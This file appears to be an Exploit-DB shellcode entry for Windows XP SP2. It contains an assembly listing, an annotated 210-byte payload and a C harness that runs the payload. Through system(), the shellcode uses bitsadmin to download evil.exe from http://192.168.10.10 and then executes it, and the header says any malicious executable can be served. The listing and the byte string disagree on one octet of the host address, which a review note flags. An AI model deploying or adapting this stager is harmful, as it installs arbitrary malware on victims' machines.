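/*
; Shellcode Title : bitsadmin download and execute
; Shellcode Author : Joseph McDonagh
; Date June 26, 2019
; Shellcode Length 210
; However, if the application you are exploiting already loads it, then all you need ...
; ... is the System Call and ExitProcess in kernel32.dll
; In between download and execute is ping -n 30 localhost, which provides a delay for the ...
; ... relatively slow bitsadmin.exe program
; Tested on Windows XP SP2
; Acknowledgement to Kartik Durg, who inspired me to start making my own shellcode
; after reading iamroot blog
; Acknowledgement to POB, using start has really helped me a lot in manual shellcode efforts
; start bitsadmin.exe /transfer "njob30" http://192.168.10.10/evil.exe "c:\evil.exe" && ping -n 30 127.0.0.1 && cmd.exe /c c:\evil.exe
; evil.exe can be generated by msfvenom, or be ANY malicious executable you happen to have
;
; EDB-Note: start bitsadmin.exe /transfer "n job30" http://192.168.10.10/evil.exe "c:\evil.exe" && ping -n 30 127.0.0.1 && cmd.exe /c c:\evil.exe

xor eax, eax ;Get the msvcrt.dll
mov ax, 0x7472 ;"tr\0\0"
push eax
push dword 0x6376736d ;"cvsm"
push esp ; LoadLibrary
mov ebx, 0x7c801d77 ;Address of function LoadLibraryA (winxp)
call ebx
mov ebp, eax ;msvcrt.dll is saved in ebp
xor eax, eax
push eax
push 0x6578652e ; exe.
push 0x6c697665 ; live
push 0x5c3a6320 ; \:c
push 0x632f2065 ; c/ e
push 0x78652e64 ; xe.d
push 0x6d632026 ; mc &
push 0x2620312e ; & 1.
push 0x302e302e ; 0.0.
push 0x37323120 ; 721
push 0x3033206e ; 03 n
push 0x2d20676e ; - gn
push 0x69702026 ; ip &
push 0x26202265 ; & "e
push 0x78652e6c ; xe.l
push 0x6976655c ; ive\
push 0x3a632220 ; :c"
push 0x6578652e ; exe.
push 0x6c697665 ; live
push 0x2f30312e ; /01.
push 0x30312e38 ; 01.8
push 0x36312e32 ; 61.2
push 0x39312f2f ; 91//
push 0x3a707474 ; :ptt
push 0x68202230 ; h "0
push 0x33626f6a ; 3boj
push 0x6e222072 ; n" r
push 0x6566736e ; efsn
push 0x6172742f ; art/
push 0x20657865 ; exe
push 0x2e6e696d ; .nim
push 0x64617374 ; dast
push 0x69622074 ; ib t
push 0x72617473 ; rats
mov edi,esp
push edi
mov eax, 0x77c293c7
call eax
xor eax, eax
push eax
mov eax, 0x7c81caa2
call eax
*/

/*
 * The 210 bytes of the listing above, grouped one instruction per line so
 * the listing and the encoded bytes can be compared side by side.  The
 * bracketed text is the dword as it lands in memory (little-endian), i.e.
 * the command string read top to bottom from the LAST push upwards.
 *
 * NOTE(review): at the [8.26] push the bytes encode 0x36322e38, whereas the
 * listing above shows `push 0x30312e38 ; 01.8`.  The listing and the byte
 * string disagree on that one dword; the byte string is what is executed,
 * so treat the listing, not the bytes, as the copy that is out of date.
 */
char code[] =
    "\x31\xc0"                  /* xor eax, eax                          */
    "\x66\xb8\x72\x74"          /* mov ax, 0x7472          [rt]          */
    "\x50"                      /* push eax                              */
    "\x68\x6d\x73\x76\x63"      /* push 0x6376736d         [msvc]        */
    "\x54"                      /* push esp                              */
    "\xbb\x77\x1d\x80\x7c"      /* mov ebx, 0x7c801d77   (LoadLibraryA)  */
    "\xff\xd3"                  /* call ebx                              */
    "\x89\xc5"                  /* mov ebp, eax                          */
    "\x31\xc0"                  /* xor eax, eax                          */
    "\x50"                      /* push eax              (terminator)    */
    "\x68\x2e\x65\x78\x65"      /* push 0x6578652e         [.exe]        */
    "\x68\x65\x76\x69\x6c"      /* push 0x6c697665         [evil]        */
    "\x68\x20\x63\x3a\x5c"      /* push 0x5c3a6320         [ c:\]        */
    "\x68\x65\x20\x2f\x63"      /* push 0x632f2065         [e /c]        */
    "\x68\x64\x2e\x65\x78"      /* push 0x78652e64         [d.ex]        */
    "\x68\x26\x20\x63\x6d"      /* push 0x6d632026         [& cm]        */
    "\x68\x2e\x31\x20\x26"      /* push 0x2620312e         [.1 &]        */
    "\x68\x2e\x30\x2e\x30"      /* push 0x302e302e         [.0.0]        */
    "\x68\x20\x31\x32\x37"      /* push 0x37323120         [ 127]        */
    "\x68\x6e\x20\x33\x30"      /* push 0x3033206e         [n 30]        */
    "\x68\x6e\x67\x20\x2d"      /* push 0x2d20676e         [ng -]        */
    "\x68\x26\x20\x70\x69"      /* push 0x69702026         [& pi]        */
    "\x68\x65\x22\x20\x26"      /* push 0x26202265         [e" &]        */
    "\x68\x6c\x2e\x65\x78"      /* push 0x78652e6c         [l.ex]        */
    "\x68\x5c\x65\x76\x69"      /* push 0x6976655c         [\evi]        */
    "\x68\x20\x22\x63\x3a"      /* push 0x3a632220         [ "c:]        */
    "\x68\x2e\x65\x78\x65"      /* push 0x6578652e         [.exe]        */
    "\x68\x65\x76\x69\x6c"      /* push 0x6c697665         [evil]        */
    "\x68\x2e\x31\x30\x2f"      /* push 0x2f30312e         [.10/]        */
    "\x68\x38\x2e\x32\x36"      /* push 0x36322e38         [8.26]  (see NOTE) */
    "\x68\x32\x2e\x31\x36"      /* push 0x36312e32         [2.16]        */
    "\x68\x2f\x2f\x31\x39"      /* push 0x39312f2f         [//19]        */
    "\x68\x74\x74\x70\x3a"      /* push 0x3a707474         [ttp:]        */
    "\x68\x30\x22\x20\x68"      /* push 0x68202230         [0" h]        */
    "\x68\x6a\x6f\x62\x33"      /* push 0x33626f6a         [job3]        */
    "\x68\x72\x20\x22\x6e"      /* push 0x6e222072         [r "n]        */
    "\x68\x6e\x73\x66\x65"      /* push 0x6566736e         [nsfe]        */
    "\x68\x2f\x74\x72\x61"      /* push 0x6172742f         [/tra]        */
    "\x68\x65\x78\x65\x20"      /* push 0x20657865         [exe ]        */
    "\x68\x6d\x69\x6e\x2e"      /* push 0x2e6e696d         [min.]        */
    "\x68\x74\x73\x61\x64"      /* push 0x64617374         [tsad]        */
    "\x68\x74\x20\x62\x69"      /* push 0x69622074         [t bi]        */
    "\x68\x73\x74\x61\x72"      /* push 0x72617473         [star]        */
    "\x89\xe7"                  /* mov edi, esp                          */
    "\x57"                      /* push edi                              */
    "\xb8\xc7\x93\xc2\x77"      /* mov eax, 0x77c293c7                   */
    "\xff\xd0"                  /* call eax                              */
    "\x31\xc0"                  /* xor eax, eax                          */
    "\x50"                      /* push eax                              */
    "\xb8\xa2\xca\x81\x7c"      /* mov eax, 0x7c81caa2                   */
    "\xff\xd0";                 /* call eax                              */

/*
 * Harness: calls the bytes in `code` as if they were a function.
 *
 * `code` is ordinary writable data, so wherever non-executable data is
 * enforced (DEP/NX) the indirect call faults instead of running; the header
 * states the code was tested on Windows XP SP2 only.  The three absolute
 * addresses in `code` (0x7c801d77, 0x77c293c7, 0x7c81caa2) are tied to
 * that build -- presumably they do not resolve on other builds or under
 * ASLR.  Per the header the final `call eax` is ExitProcess, so control
 * is not expected to come back here; `return 0` is reached only if it does.
 *
 * argc/argv are unused.  Converting an object pointer to a function
 * pointer is not defined by ISO C; it is what this harness (like the
 * original) relies on, so it is kept, but with a prototyped pointer type
 * and the discarded result made explicit instead of the old `(int)` cast.
 */
int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;

    int (*entry)(void) = (int (*)(void))code;
    (void)entry();

    return 0;
}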